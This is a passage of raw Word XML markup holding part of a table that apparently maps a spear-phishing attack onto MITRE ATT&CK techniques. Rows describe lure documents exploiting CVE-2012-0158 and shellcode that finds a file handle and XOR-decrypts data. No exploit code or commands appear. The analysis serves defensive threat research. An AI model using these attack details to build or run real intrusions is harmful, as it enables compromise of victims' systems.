                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7824DCF9" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">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291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393E22A9" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">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49" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC47DF2" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50206A81" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A2BC8B" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C27E6A1" w14:textId="3204313A" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11C788EE" w14:textId="5922A34C" w:rsidR="00324B94" w:rsidRPr="003930D6" w:rsidRDefault="00FE5935" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003930D6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="0DC2FC40" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6803E9F3" w14:textId="07D2AEEA" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="004F01AF" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793306DC" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">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291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359B223B" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1203 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7CF219" w14:textId="2FACAFC6" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00460425" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2360798F" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47241992" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EF5DFD6" w14:textId="51413C59" w:rsidR="00324B94" w:rsidRPr="00B857D7" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499900DD" w14:textId="7BBA8046" w:rsidR="00324B94" w:rsidRPr="003930D6" w:rsidRDefault="00FE5935" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003930D6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158</w:t>
            </w:r>
            <w:r w:rsidR="00595849" w:rsidRPr="003930D6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> ([8] allows remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability.")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A2D24" w:rsidRPr="002D1D50" w14:paraId="48B2BCE2" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DEB1B2F" w14:textId="14EDA7A7" w:rsidR="008A2D24" w:rsidRDefault="004F01AF" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F7E9D35" w14:textId="5357515A" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">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2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3761F0DE" w14:textId="2E518F1E" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059 Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43623CCE" w14:textId="6A7F665A" w:rsidR="008A2D24" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC3819B" w14:textId="77777777" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="294FD7D3" w14:textId="34866848" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77177C30" w14:textId="4C026B35" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0422AA" w14:textId="7A83ED86" w:rsidR="008A2D24" w:rsidRDefault="00FA71B1" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="008A2D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>First shell code in malicious document</w:t>
            </w:r>
            <w:r w:rsidR="0095085B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> [1] </w:t>
            </w:r>
            <w:r w:rsidR="0095085B">
              <w:t>The embedded shellcode enumerates open handles for a file with a size greater than 0xa6f0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F01AF" w:rsidRPr="0035652A" w14:paraId="48BAAC2B" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA9D61E" w14:textId="0C2C5ACA" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1787EC8E" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005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Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548ACB24" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140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Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA00FD3" w14:textId="235B66FA" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768BF322" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71FB4554" w14:textId="048A4FFA" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9F8999" w14:textId="553898C2" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="009C415E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366E8395" w14:textId="60712154" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1] The shellcode then decrypts the first 0xc0 (decimal 192) DWORDs of the data read from the file using an XOR algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A2D24" w:rsidRPr="002D1D50" w14:paraId="4FFB6C6B" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3593DB" w14:textId="50D56973" w:rsidR="008A2D24" w:rsidRDefault="004F01AF" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3575FA6C" w14:textId="340876F7" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">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2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A14CE1D" w14:textId="224CD44F" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059 Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B33EFF2" w14:textId="492AE46A" w:rsidR="008A2D24" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="728906B4" w14:textId="77777777" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="008A2D24" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD327E5" w14:textId="0D899200" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AE4372" w14:textId="305B6725" w:rsidR="008A2D24" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="505E62A6" w14:textId="3FF781A2" w:rsidR="008A2D24" w:rsidRDefault="00FA71B1" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="008A2D24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Second shell code in malicious document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F01AF" w:rsidRPr="0035652A" w14:paraId="62A15486" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="342F41BC" w14:textId="4CE2276D" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F9A2EA" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005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Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AEBA7C6" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140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Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
